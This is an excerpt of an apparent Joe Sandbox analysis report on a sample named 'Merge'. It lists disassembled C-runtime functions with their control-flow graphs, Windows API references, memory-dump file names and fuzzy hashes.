                                                                                                    control_flow_graph 69 16dca11-16dca3b 70 16dca3d-16dca3f 69->70 71 16dca41-16dca43 69->71 72 16dca92-16dca95 70->72 73 16dca49-16dca50 call 16dc946 71->73 74 16dca45-16dca47 71->74 76 16dca55-16dca59 73->76 74->72 77 16dca78-16dca8f 76->77 78 16dca5b-16dca69 GetProcAddress 76->78 79 16dca91 77->79 78->77 80 16dca6b-16dca76 call 16ba2cc 78->80 79->72 80->79
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2551805234.0000000000DE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2551668024.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.000000000173C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001755000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.000000000176D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001826000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001894000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.00000000018AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001909000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.000000000196A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.00000000019BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.00000000019D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001AA9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001AF6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001B86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2560993757.0000000001D1A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2561662999.0000000001D28000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2561700282.0000000001D2B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2561724024.0000000001D79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2561724024.0000000001DB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2562339066.0000000001DB6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2562339066.00000000027B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2562339066.00000000031B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_de0000_Merge.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 46ce45ca8733ee4dab7b9e5ebfe276bfe819a6985ed49d4b7cd776262dad6ee3
                                                                                                    • Instruction ID: aacc8bd009b05984251e292cd3b1e970eccbbe2ebeacf32f3ff1f48d3f5b7bbe
                                                                                                    • Opcode Fuzzy Hash: 46ce45ca8733ee4dab7b9e5ebfe276bfe819a6985ed49d4b7cd776262dad6ee3
                                                                                                    • Instruction Fuzzy Hash: 9201F933A042299BDB26CEACEC409263766BBC53357184218FE149B288DF32D811C781
                                                                                                    Function 016DC150 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 83 16dc150-16dc15b 84 16dc15d-16dc167 83->84 85 16dc169-16dc16f 83->85 84->85 86 16dc19d-16dc1a8 call 16cb4a1 84->86 87 16dc188-16dc199 RtlAllocateHeap 85->87 88 16dc171-16dc172 85->88 93 16dc1aa-16dc1ac 86->93 89 16dc19b 87->89 90 16dc174-16dc17b call 16d8b59 87->90 88->87 89->93 90->86 96 16dc17d-16dc186 call 16d64d7 90->96 96->86 96->87
                                                                                                    APIs
                                                                                                    • RtlAllocateHeap.NTDLL(00000008,?,?,?,016DBCC0,00000001,00000364,?,00000006,000000FF,?,016BB23D,01D15E68,0000000C), ref: 016DC191
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2551805234.0000000000DE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2551668024.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.000000000173C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001755000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.000000000176D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001826000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001894000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.00000000018AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001909000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.000000000196A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.00000000019BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.00000000019D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001AA9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001AF6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001B86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2560993757.0000000001D1A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2561662999.0000000001D28000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2561700282.0000000001D2B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2561724024.0000000001D79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2561724024.0000000001DB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2562339066.0000000001DB6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2562339066.00000000027B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2562339066.00000000031B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_de0000_Merge.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1279760036-0
                                                                                                    • Opcode ID: 2c38818be64291b2a5e712a0e48f4e317716e759174aa857ea0cb07fdb20f01b
                                                                                                    • Instruction ID: 4794b6e69a8a7e0ebc9fdf996781b4de2581e13d9461877d0dbd2837ab0598cc
                                                                                                    • Opcode Fuzzy Hash: 2c38818be64291b2a5e712a0e48f4e317716e759174aa857ea0cb07fdb20f01b
                                                                                                    • Instruction Fuzzy Hash: 1CF0E931D45239B7FB212B79DC04F6A7B59AF816B2B14811DED14D7284CF30D401C6E0
                                                                                                    Function 016DD11E Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 99 16dd11e-16dd12a 100 16dd15c-16dd167 call 16cb4a1 99->100 101 16dd12c-16dd12e 99->101 108 16dd169-16dd16b 100->108 103 16dd147-16dd158 RtlAllocateHeap 101->103 104 16dd130-16dd131 101->104 105 16dd15a 103->105 106 16dd133-16dd13a call 16d8b59 103->106 104->103 105->108 106->100 111 16dd13c-16dd145 call 16d64d7 106->111 111->100 111->103
                                                                                                    APIs
                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,016C1B39,01D15FC8,00000014,00000003), ref: 016DD150
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2551805234.0000000000DE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2551668024.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.000000000173C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001755000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.000000000176D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001826000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001894000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.00000000018AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001909000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.000000000196A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.00000000019BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.00000000019D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001AA9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001AF6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001B86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2560993757.0000000001D1A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2561662999.0000000001D28000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2561700282.0000000001D2B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2561724024.0000000001D79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2561724024.0000000001DB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2562339066.0000000001DB6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2562339066.00000000027B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2562339066.00000000031B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_de0000_Merge.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1279760036-0
                                                                                                    • Opcode ID: 5902bfa99bf6030a5a0f9b45063edadc7239bcc8bf17ec950f99dd71c74d5d30
                                                                                                    • Instruction ID: 65b08d4d5b4f9c8f6b65a7ce8ce668dd3f1a861416cc3afe147fafa70a495fc7
                                                                                                    • Opcode Fuzzy Hash: 5902bfa99bf6030a5a0f9b45063edadc7239bcc8bf17ec950f99dd71c74d5d30
                                                                                                    • Instruction Fuzzy Hash: 36E06D35D41222ABEA213AF99C04B7B7F6EDF827B2F094125EE05963C0DB64D801C6E5

                                                                                                    Non-executed Functions

                                                                                                    Function 016C1FE7 Relevance: 4.6, APIs: 3, Instructions: 77COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 016C20DF
                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 016C20E9
                                                                                                    • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 016C20F6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2551805234.0000000000DE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2551668024.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.000000000173C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001755000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.000000000176D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001826000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001894000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.00000000018AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001909000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.000000000196A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.00000000019BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.00000000019D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001AA9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001AF6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001B86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2560993757.0000000001D1A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2561662999.0000000001D28000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2561700282.0000000001D2B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2561724024.0000000001D79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2561724024.0000000001DB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2562339066.0000000001DB6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2562339066.00000000027B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2562339066.00000000031B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_de0000_Merge.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                    • String ID:
                                                                                                    • API String ID: 3906539128-0
                                                                                                    • Opcode ID: b471c5a3a3c444baab831776dbdb82a1e84a4174465eec2399ca52cf760a45c3
                                                                                                    • Instruction ID: 40430dc6cbb6d8d3ebf11ca1704edb1e760bb7cf5ba3e601d4c23e421f21b533
                                                                                                    • Opcode Fuzzy Hash: b471c5a3a3c444baab831776dbdb82a1e84a4174465eec2399ca52cf760a45c3
                                                                                                    • Instruction Fuzzy Hash: 1731D275901229ABCB21DF28DC8879DBBB8FF58710F5041EAE91CA7290E7709B858F45
                                                                                                    Function 016AF310 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 167COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 016AF347
                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 016AF34F
                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 016AF3D8
                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 016AF403
                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 016AF458
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2551805234.0000000000DE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2551668024.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.000000000173C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001755000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.000000000176D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001826000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001894000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.00000000018AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001909000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.000000000196A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.00000000019BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.00000000019D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001AA9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001AF6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001B86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2560993757.0000000001D1A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2561662999.0000000001D28000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2561700282.0000000001D2B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2561724024.0000000001D79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2561724024.0000000001DB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2562339066.0000000001DB6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2562339066.00000000027B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2562339066.00000000031B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_de0000_Merge.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                    • String ID: csm
                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                    • Opcode ID: 45ccb981a9014892a03f1424524715220959aa2ad7c738be7a9d949ab2524ff4
                                                                                                    • Instruction ID: ef0268b7d848cb6d362408709ce7f48c7f0128ddbc63c4f04cc336b0f2ac3307
                                                                                                    • Opcode Fuzzy Hash: 45ccb981a9014892a03f1424524715220959aa2ad7c738be7a9d949ab2524ff4
                                                                                                    • Instruction Fuzzy Hash: 1051C235A01219AFCB10DF68CC84AAEBBA6EF45314F548199E9145B352D732EE05CFD2
                                                                                                    Function 016BA4B4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BBD71996,?,?,00000000,01732A40,000000FF,?,016BA490,00000002,?,016BA464,016CB280), ref: 016BA4E9
                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 016BA4FB
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,01732A40,000000FF,?,016BA490,00000002,?,016BA464,016CB280), ref: 016BA51D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2551805234.0000000000DE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2551668024.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.000000000173C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001755000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.000000000176D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001826000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001894000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.00000000018AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001909000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.000000000196A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.00000000019BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.00000000019D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001AA9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001AF6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001B86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2560993757.0000000001D1A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2561662999.0000000001D28000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2561700282.0000000001D2B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2561724024.0000000001D79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2561724024.0000000001DB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2562339066.0000000001DB6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2562339066.00000000027B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2562339066.00000000031B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_de0000_Merge.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                    • Opcode ID: 69d0a4a3c3090d04e2ec7ec9360c47687313fc4f1e84435cc83365359cc27956
                                                                                                    • Instruction ID: 544246a08a1969eca7c7f71de8f2791dd0f97f5a31a0e9b73e16347ee5d71dac
